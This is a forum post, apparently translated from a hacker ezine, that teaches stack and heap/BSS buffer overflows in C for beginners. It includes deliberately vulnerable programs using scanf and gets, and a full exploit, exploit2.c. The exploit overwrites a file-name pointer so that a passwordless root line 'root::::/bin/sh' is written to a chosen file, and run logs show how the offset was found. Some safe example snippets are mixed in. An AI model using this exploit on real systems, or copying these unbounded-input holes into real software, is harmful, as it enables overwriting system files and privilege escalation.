Forum Thread: Exploiting Heap Overflow for Beginners -by Mohamed Ahmed.

Something simple: overflows for nerds.
So, we are sitting in front of a computer that is running a program
and we ask ourselves, "Why does this machine work?" The truth is that
explaining how the processor does what it does is a bit complex (it took me
four months of a rock-hard course to understand it ;) but we can
make a rough summary of it: we have a processor that, as its
name indicates, only processes the data held in memory (or on
the hard disk, etc.). "And how does the processor know how to
process a given piece of data?"
By means of preprogrammed binary codes that tell it which instruction
to execute next and which data to apply it to. "And how does the processor know that what
it is processing is data and not another instruction of the program that it should
execute?" It does not know, and this is precisely the fact
we are going to take advantage of for our evil purposes.

Let's see: the memory of a computer, as you all know, is simply a
bunch of cells in which you can store 0s or 1s. It consists of nothing
more than that. For example, if we take a very small portion of memory
and look at what it contains, it surely looks like this:
--------------------------------------------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
--------------------------------------------------------------------------------------------------------

and what this whole series of digits actually means is this:
--------------------------------------------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
--------------------------------------------------------------------------------------------------------
instruction | data | data | instruction | instr ...
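
The point that the same bits mean whatever the reader decides they mean can be
tried out in C. This is only a small sketch: the helper names bytes_as_u32 and
bytes_as_text are made up for illustration, and the numeric value you get depends
on the byte order of your machine.

```c
#include <stdint.h>
#include <string.h>

/* Read the first four bytes at `bytes` as one 32-bit number.
 * memcpy is used so that no alignment or aliasing rule is broken. */
uint32_t bytes_as_u32(const unsigned char *bytes)
{
    uint32_t value;
    memcpy(&value, bytes, sizeof value);
    return value;
}

/* Read the very same four bytes as a NUL-terminated piece of text. */
void bytes_as_text(const unsigned char *bytes, char out[5])
{
    memcpy(out, bytes, 4);
    out[4] = '\0';
}
```

Feeding both helpers the bytes 'A', 'B', 'C', 'D' gives the text "ABCD" from one
and a plain number from the other; nothing in memory says which reading is the
"right" one.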

Ever since the first computers there was the idea of adding
a tag (one extra bit) to each word to mark whether the
word in question was an instruction or data; but at that time
an extra bit was quite expensive, and programs
would run much more slowly with one more bit to process. In addition, Von Neumann
(a guy to whom we owe many of the concepts behind
today's computers) had shown years earlier that, with a well-organized
processor and orderly access to memory, there was no need to differentiate
between instructions and data: the processor would act on an
instruction and fetch the data indicated by that instruction,
and since an instruction always points to a memory area that
holds its data, there was no problem.

But will the instruction really always point to a memory area
that holds its own data? Well... that is debatable...
Let's look at the silliest example of a stack overflow there is. We have a
variable (that is, one of the 'data' items of the instruction) and we run something
as simple as this little program:

code
......
main ()
{
    char data[20];
    ....
    scanf ("%s", data);   /* no limit on how much is read into data */
    ....
}
....

and memory would look more or less like this (the x's represent instructions):

.... xxxx | 0000000000 ... 0000000000 | xxxxx ...... xxx | xxxxxxx ...... xxxxxxx | .....

The run of zeros is the data[20] variable, and one of the x blocks holds the
scanf instruction.

And just like that, the game is set up. Normally,
when the user is asked to enter the text that fills the
data[20] variable, they type fewer than 20 characters and there is no problem; the
problem appears when they decide to type a few more. It turns out that the
C language does not check bounds when executing calls like this one, so
it simply keeps accepting characters and storing them in
the memory locations adjacent to the data[20] variable, more or less
like this:

Case 1:
the user is a nice person
----------------------------------------------------------------------------------
..... I am med0000000000000 | xxxxxxxxxxxxx ... xxxx | .....
----------------------------------------------------------------------------------
Case 2:
the user is a "haxor" wanting to do something illegal
----------------------------------------------------------------------------------
..... I am a mohamed jaj | ajajajaxxxxxxxx ... xx | .....
----------------------------------------------------------------------------------
Here we see how the first bits of the instruction that follows
data[20] have been overwritten. What normally happens in these cases is that the
processor, on trying to execute an instruction that of course does not match
any valid one, raises an error and the program is terminated.
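
To put numbers on the two cases, here is a small sketch in C. The function names
bytes_past_end and copy_bounded are invented for this illustration; the first
only computes how far an unchecked copy would spill, and the second shows the
kind of bounded copy that avoids the spill altogether.

```c
#include <stddef.h>
#include <string.h>

/* How many bytes (counting the terminating NUL) an unchecked copy of
 * `input` would write beyond a buffer of `bufsize` bytes. */
size_t bytes_past_end(const char *input, size_t bufsize)
{
    size_t needed = strlen(input) + 1;
    return needed > bufsize ? needed - bufsize : 0;
}

/* Bounded copy: keeps at most bufsize-1 characters and always
 * NUL-terminates. Returns 1 if the input had to be cut, 0 otherwise. */
int copy_bounded(char *buf, size_t bufsize, const char *input)
{
    size_t len = strlen(input);
    int truncated;

    if (bufsize == 0)
        return 1;               /* nowhere to put even the terminator */
    truncated = len >= bufsize;
    if (truncated)
        len = bufsize - 1;
    memcpy(buf, input, len);
    buf[len] = '\0';
    return truncated;
}
```

With a 20-byte buffer, an 8-character input spills nothing, while a 25-character
input would put 6 bytes (5 characters plus the NUL) on top of whatever follows
the buffer.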

However, the trick is to overwrite the instruction that follows
data[20] with something the processor does understand. Most commonly it
is overwritten with a jump to another memory location where we have
previously placed a call to a shell so that, instead of the original
instruction, a shell is executed that gives us access to the system.
Graphically:

........................................................
................ data[20]JUMPxxxxxxxx ..................
........................................................
........................................................
........................................................
shell

and the program ends up running a brand new, freshly
invoked shell :).

Well, I won't dwell on the subject of these overflows;
I suppose you all got the idea. Everything I have said so far
refers to stack overflows, about which plenty of articles have been
written in both Spanish and English, so if you are interested,
you just have to look around a bit... (and not far, this ezine carries them all ;)

Heap overflows.
In the previous paragraphs we have seen the basis of a stack overflow. It
is not very complex, but it has certain quirks that must be taken into
account, such as finding the return addresses of function
calls and things like that (to learn more, your best bet is to read the
various articles published on the subject). I prefer heap overflows
for their simplicity and their "purity of lines", as some bad
car advertisement would say. ;)

Of course, to understand what a heap overflow is, the first thing
to know is what the heap is ;). Let's see: a program has two
ways of asking the OS for the memory it needs to do its job. One of them is the
typical one, which we used before:

char data[20];

so the system allocates a memory zone identified by the
name "data" with a size of 20 bytes. This is the traditional,
"static" form; that is, if at any point in the program we need
the variable data to be 40 bytes, we cannot do it.

The other way, and the one that interests us, is for the program to request the
memory it needs at runtime (the other form is said to happen "at compile time");
the OS then searches for free memory and, if any is available, hands it
to the program. Usually this is done with:

Code:
char *data;
data = (char *) malloc(SIZEofMEMORY);

and the system returns the assigned memory zone in "data" or, if none is
free, sets data to NULL. Here we see that "data" is no
longer a variable in the "classic" sense of the word but a
pointer that, as its name indicates, points to the first
of a series of memory positions.
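
As a rough sketch of what the runtime form buys us, the snippet below checks the
NULL case mentioned above and then grows a block from 20 to 40 bytes, which the
"static" form cannot do. The helper names make_buffer and grow_buffer are made up
for this example; malloc, realloc and free are the standard C library calls.

```c
#include <stdlib.h>
#include <string.h>

/* Allocate `capacity` bytes on the heap and copy `text` into them.
 * Returns NULL if the text does not fit or if no memory is available. */
char *make_buffer(const char *text, size_t capacity)
{
    char *data;

    if (strlen(text) + 1 > capacity)
        return NULL;
    data = malloc(capacity);
    if (data == NULL)           /* the "no free memory" case */
        return NULL;
    strcpy(data, text);
    return data;
}

/* Resize *data to new_capacity bytes. Returns 0 on success; on failure
 * returns -1 and leaves the old block valid and untouched. */
int grow_buffer(char **data, size_t new_capacity)
{
    char *bigger = realloc(*data, new_capacity);

    if (bigger == NULL)
        return -1;
    *data = bigger;             /* the block may have moved */
    return 0;
}
```

A caller would do something like `char *d = make_buffer("hello", 20);`, later
`grow_buffer(&d, 40);`, and finally `free(d);`. The contents survive the resize
even if the block moves.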

By now someone should be asking, "if an overflow consists of
overwriting a memory zone, how can the OS be so silly as to let
malloc() hand us a memory zone that is already
occupied?" Very simple: the OS is not silly. Well, not quite :). The OS
simply does what we ask within limits, so
it will never give us positions that are already in use, but nothing prevents us from
wandering into those positions ourselves. What we have to keep in
mind is that C does not check that we are writing inside
the memory assigned to us (if it does not check the bounds of
ordinary variables, it is only logical that it does not check these either, because
both cases come down to the same thing: writing somewhere that was not
intended for you), so we will always be able to write to any other position that is
valid. That is, if we have two memory zones (they do not
need to be consecutive) allocated for two variables, the OS will
let us write to the second through the first, and vice versa, for the simple
reason that both pointers refer to areas of memory that
have been marked as "writable" for the program. Let's
see it with a very clear example:

code
<++> heap/example1.c 92ca44fdc06aa8f1d800ecf7fe6309
/*
 * the simplest possible example of an overflow in the heap zone
 * based directly on one from w00w00
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main ()
{
    char *data1, *data2;      /* our variables */
    unsigned long distance;   /* the actual distance in memory between
                                 our two variables. If the two blocks
                                 were exactly adjacent, it would be 40 */

    /* request memory allocation. Let's ask for 40 bytes each */
    data1 = (char *) malloc (40);
    data2 = (char *) malloc (40);

    /* we look at how far apart they are */
    distance = (unsigned long) data2 - (unsigned long) data1;

    /* now we fill data2 with a normal string. All memset() does
       is fill the memory it is given with one character;
       the last byte is set to the string terminator */
    memset (data2, 'P', 40 - 1), data2[40 - 1] = '\0';

    printf ("before overwriting: %s\n", data2);

    /* we overwrite 20 bytes of data2 using the variable data1 and the
       distance separating them */
    memset (data1, '*', (unsigned int) (distance + 20));

    /* we check */
    printf ("after overwriting: %s\n", data2);

    return 0;
}
<-->

Once we have it, we run it and see how the data1 pointer overwrites
the area assigned to data2; the OS allows it for the simple reason
that both zones (data2's and the one that data1 is supposed to
use) are of the same type and were set up in the same way, and since
C does not check addresses, nothing notices that a write supposedly
going to data1 is in fact landing in data2's
zone.

code
...
cafo@thehost:~/nets/heap$ ./example1
before overwriting: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
after overwriting: ********************PPPPPPPPPPPPPPPPPPP
...

So the concept is now quite clear, right? All we need is
one pointer in the heap zone that we can control in order
to reach all the other data in that zone.
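
For anyone who wants to watch the same effect without stepping outside memory
they own, here is a sketch that fakes the heap with a single 80-byte array. The
names overflow_demo, zone1, zone2 and ZONE are made up for the illustration: the
first 40 bytes play the role of the first block and the last 40 the role of the
second, so every write stays inside one object.

```c
#include <string.h>

#define ZONE 40   /* size of each pretend heap block */

/* `arena` stands in for the heap. Fill the second zone with 'P', then
 * write through the first zone's pointer far enough to cover `extra`
 * bytes of the second zone. */
void overflow_demo(char arena[2 * ZONE], size_t extra)
{
    char *zone1 = arena;
    char *zone2 = arena + ZONE;
    size_t distance = (size_t)(zone2 - zone1);

    memset(zone2, 'P', ZONE - 1);
    zone2[ZONE - 1] = '\0';

    if (extra > ZONE - 1)
        extra = ZONE - 1;       /* never touch the terminator or leave the arena */

    /* the write starts at zone1 but does not stop at its end */
    memset(zone1, '*', distance + extra);
}
```

After `overflow_demo(arena, 20)`, printing the string at `arena + ZONE` shows 20
asterisks followed by 19 P's.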

Well, so much rambling about the heap zone and I still have not explained what it is. ;)
The heap is simply a zone of dynamic memory where variables are
stored by means of calls to malloc(). Those who have
read a book on OS architecture and the like will probably find the pair
HEAP/BSS familiar. The BSS (and I swear that I have not been able to find anywhere what
those damn initials stand for ;) is simply the memory area
that holds uninitialized global variables and those
declared as 'static'. For example, if we want memory that we do not
have to initialize but that behaves like the pointer we
used before, we can write something like this:

static char data1[40];

which would be the BSS-zone equivalent of the malloc() call we made in
the previous little program.
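
A quick way to see what such a variable looks like from inside a program is
sketched below. The function names bss_buffer and count_zero_bytes are invented
here. What C itself promises is that a static object with no initializer starts
out zero-filled and keeps its contents for the whole run; that it ends up in the
BSS area is how typical toolchains arrange things, not something the language
guarantees.

```c
#include <stddef.h>

/* Hands out the address of a static, uninitialized 40-byte buffer. */
char *bss_buffer(void)
{
    static char data1[40];   /* no initializer: starts out all zeros */
    return data1;
}

/* Counts how many of the n bytes starting at p are zero. */
size_t count_zero_bytes(const char *p, size_t n)
{
    size_t zeros = 0;
    size_t i;

    for (i = 0; i < n; i++)
        if (p[i] == 0)
            zeros++;
    return zeros;
}
```

Calling `count_zero_bytes(bss_buffer(), 40)` before anything is written reports
all 40 bytes as zero, and anything stored through the pointer is still there the
next time bss_buffer() is called.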

Well, at this point more than one of you will be asking, "And what
use is this to me?" The truth is that if you are asking that,
you still need a fair bit of practice with exploits ;). But seriously:
you simply have to find source code (quite common in these
open-source times...) that uses one of the kinds of variable I have described
and that lets the user write to it. The typical situation is that the
programmer uses one of these pointers to request data from the user.

Imagine that we have a program that does nothing but write what
we tell it into a file that we cannot choose. Something like this:

code
<++> heap/example2.c $d102f90f44986e093acb7a01aef6d723
/*
 * example2.c  Shows a vulnerable program in the BSS zone
 */

#include <stdio.h>

int main ()
{
    FILE *file;
    static char data1[16], *tmpfile;

    tmpfile = "/tmp/mama.txt";   /* any temporary file will do */
    printf ("before the exploit: %s\n", tmpfile);   /* to make sure... */

    printf ("Data to be entered in mama.txt:\n");
    /* the vulnerable call: gets() has no idea data1 is only 16 bytes
       (newer compilers may need an older language standard to accept it) */
    gets (data1);

    printf ("\nafter the exploit: %s\n", tmpfile);
    file = fopen (tmpfile, "w");

    fputs (data1, file);
    fclose (file);
    return 0;
}
<-->

Well, there is the program in question. At first glance it is not vulnerable,
because the only thing that can be modified "from outside" is what is written to
the file "mama.txt", so system security is not
at risk, right? Don't count on it: we can use what we said earlier about
overwriting pointers to make the program do certain undesirable
things, such as overwriting system files and the like, and we
can always find files that are worth overwriting, right?
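
For contrast, this is roughly what a bounded read looks like. It is a sketch of
one possible replacement for the gets() call, not a change the original program
ever made; the function name read_line_bounded and its return codes are made up
here, while fgets and getc are the standard library calls.

```c
#include <stdio.h>
#include <string.h>

/* Read one line from `in` into buf, never storing more than size-1
 * characters. The trailing newline is removed and the rest of an
 * overlong line is thrown away.
 * Returns 0 on success, 1 if the line was cut, -1 on EOF or error. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    size_t len;
    int c;
    int truncated = 0;

    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';    /* whole line fitted */
        return 0;
    }

    /* no newline stored: drain whatever is left of this line */
    while ((c = getc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}
```

With a 16-byte buffer, a 30-character line comes back as its first 15 characters
with a return value of 1, and whatever sits after the buffer is never touched.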

The trick in this case is that the variable where the file
name is stored is a pointer, whereas the buffer where we save the data we
want to put in the file lives in the BSS zone, which lets us
play around a little with addresses. All we have to do is
try different offsets, writing past "data1" into "tmpfile", until we
completely overwrite tmpfile with the address of the name of a
file that we are interested in writing. Let's look at an example:

code
<++> heap/exploit2.c $cc2e106df958188984666213aa549c49
/* exploit for program example2.c
 * the original is still in w00w00 ;)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define BUFSIZE 256
#define ERROR -1

#define DIFF 16   /* bytes between data1 and tmpfile in example2 */

#define VULPROG "./example2"
#define VULFILE "/tmp/mierdapami"

/* returns the stack pointer; 32-bit x86 with GCC-style inline asm only */
u_long getesp ()
{
    __asm__ ("movl %esp,%eax");
}

int main (int argc, char **argv)
{
    u_long addr;

    register int i;
    int mainbufsize;

    /* sized with BUFSIZE: this payload plus DIFF filler bytes
       does not fit in DIFF + 6 + 1 */
    char *mainbuf, buf[BUFSIZE] = "+ +\t# ";

    if (argc <= 1) {
        fprintf (stderr, "Usage: %s <offset>\n", argv[0]);
        exit (ERROR);
    }

    memset (buf, 0, sizeof (buf)), strcpy (buf, "root::::/bin/sh\t#");

    memset (buf + strlen (buf), 'A', DIFF);
    addr = getesp () + atoi (argv[1]);

    /* store the address byte by byte, least significant first */
    for (i = 0; i < sizeof (u_long); i++)
        buf[DIFF + i] = ((u_long) addr >> (i * 8) & 255);

    mainbufsize = strlen (buf) + strlen (VULPROG) +
                  strlen (VULPROG) + strlen (VULFILE) + 13;

    mainbuf = (char *) malloc (mainbufsize);
    if (mainbuf == NULL)
        exit (ERROR);
    memset (mainbuf, 0, mainbufsize);

    snprintf (mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
              buf, VULPROG, VULFILE);

    system (mainbuf);
    return 0;
}
<-->
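
The for loop in the listing is just storing a number one byte at a time, lowest
byte first, which is the order a little-endian machine keeps a pointer in
memory. A stand-alone sketch of that step, with made-up names pack_le and
unpack_le and an arbitrary example value, looks like this:

```c
#include <stddef.h>

/* Store the low n bytes of `value` into out[0..n-1], least significant
 * byte first. n must not exceed sizeof(unsigned long). */
void pack_le(unsigned long value, unsigned char *out, size_t n)
{
    size_t i;

    for (i = 0; i < n; i++)
        out[i] = (unsigned char)((value >> (i * 8)) & 255);
}

/* The reverse operation: rebuild the number from n bytes. */
unsigned long unpack_le(const unsigned char *in, size_t n)
{
    unsigned long value = 0;
    size_t i;

    for (i = 0; i < n; i++)
        value |= (unsigned long)in[i] << (i * 8);
    return value;
}
```

Packing the example value 0xBFFFFC44 into four bytes gives 0x44, 0xFC, 0xFF,
0xBF in that order.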

So there we have it: a seemingly innocent program like this one
is able to write whatever we want anywhere
we have write privileges. We only have to try
different offsets until the pointer lands on the complete path:

code
...
cafo@thehost:~/nets/heap$ ./exploit2 500
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after the exploit: G=spanish
...

Oops, we have landed in the area of the environment variables (didn't I say that this
kind of exploit can be really useful? ;). Let's keep trying (this is more or
less a game of Battleship, except we have the advantage that
we can test millions of values per minute, right? :)

...
cafo@thehost:~/nets/heap$ ./exploit2 400
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after the exploit: üÿ¿
...

Whoops, we have landed in the executable code. Too low. Miss ;)

...
cafo@thehost:~/nets/heap$ ./exploit2 450
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after the exploit: mplo2
...

This sounds better already. It is the name of the vulnerable program, so we can assume
that we are in argv[0], right? Still a miss.

...
cafo@thehost:~/nets/heap$ ./exploit2 465
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after the exploit: dapami
...

Good, good, good, this is much better. We have just found the
string that names the file we want to overwrite. HIT! Counting
on our fingers, it turns out that

code
cafo@thehost:~/nets/heap$ ./exploit2 456
before the exploit: /tmp/mama.txt
Data to be entered in mama.txt:

after the exploit: /tmp/mierdapami
...
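
The finger counting can be written down. At offset 465 only the last 6
characters ("dapami") of the 15-character path showed up, so the path must start
15 - 6 = 9 bytes earlier, at 465 - 9 = 456. A small sketch of that arithmetic,
with a made-up function name start_offset:

```c
#include <string.h>

/* `tail` is what got printed at `seen_offset`; `full` is the complete
 * string we were hoping for. Returns the offset at which `full` begins,
 * or -1 if `tail` is not the ending of `full` (this sketch assumes real
 * offsets are never negative). */
long start_offset(long seen_offset, const char *full, const char *tail)
{
    size_t full_len = strlen(full);
    size_t tail_len = strlen(tail);

    if (tail_len > full_len ||
        strcmp(full + (full_len - tail_len), tail) != 0)
        return -1;
    return seen_offset - (long)(full_len - tail_len);
}
```

`start_offset(465, "/tmp/mierdapami", "dapami")` comes out as 456, the value used
in the run above.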

SUNK!!! If everything went well, our tmp directory now holds that
file with the contents we wanted it to have. Let's see:

...

code
cafo@thehost:~/nets/heap$ cat /tmp/mierdapami
root::::/bin/sh
cafo@thehost:~/nets/heap$

Interesting, right? Too bad that line did not end up somewhere else...
but anyway, since this is not meant for doing bad things, I'll let you
investigate.

So far everything has gone very well. Of course, up to now we have only
worked with my own programs, that is, I knew when I wrote them that they would
be vulnerable. The next step would be to find out what kinds of programs
may be vulnerable and what kinds of variables are typically overwritten
by exploits, but we'll leave that for the second part of the article...

greetings
